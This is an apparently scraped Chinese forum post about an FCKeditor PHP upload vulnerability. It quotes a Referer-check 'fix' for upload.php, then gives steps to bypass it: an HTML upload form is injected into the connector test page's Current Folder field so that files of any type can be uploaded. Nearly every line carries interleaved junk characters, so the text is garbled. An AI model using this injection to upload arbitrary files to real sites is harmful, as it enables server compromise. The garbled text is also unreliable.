漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
5 a: o; w( I2 K网上给出的修复方案是
& Y7 P' X" U( I/ z6 r# X3 ~修复方法,删除FCK编辑器用其他的编辑器
4 k& l! u" N; x8 U# L) Y2 r或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
3 |+ G( O t9 ], P在
' D$ S1 e: ^0 q" ]& Nrequire(‘config.php’);
+ f }0 n9 x, _5 Vrequire(‘util.php’);2 L* k" R9 e3 C, U
的下面添加以下代码—————————–; ~4 j5 q0 U0 n" N- y
//防止外部提交
+ i8 U* p" V0 s3 [function outsidepost()$ a7 e( z; E! A, p
{
$ r$ w" c6 Z& _, s8 k1 N$servername=$_SERVER['SERVER_NAME'];
* I$ g4 ~9 O* V8 N$sub_from=@$_SERVER['HTTP_REFERER'];& T6 P2 U }' \2 }5 o* y
$sub_len=strlen($servername);
7 {& A; i$ C- a0 B$checkfrom=substr($sub_from,7,$sub_len);# C+ ?+ Z& [, `1 E
if($checkfrom!=$servername){, d+ |4 o) S7 f, E r# t( ^
echo(“you don’t outsidepost!”);6 M( ^. c/ F+ V0 c" A
exit;9 c( c" P) ^' w- m
}" |+ L+ Q/ r) Z' x9 J: I! U* V
}3 }1 h. V+ }- E) p9 t, M
outsidepost();- d- [0 J# A) K5 D$ x7 [5 G, z$ `; H: d
防止外部提交,但是没有防止内部提交,& H- ?7 N: A2 i
利用方法:/ z2 A" m# C3 m" z3 d3 Y( X3 Q
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html3 d4 S) v7 R$ B
2,在Current Folder 框输入
3 d+ s5 K: _% p6 `7 {<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
3 Z/ ?' X, ]/ r0 L3 C然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
5 l0 R- U* E/ Q8 T2 LPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对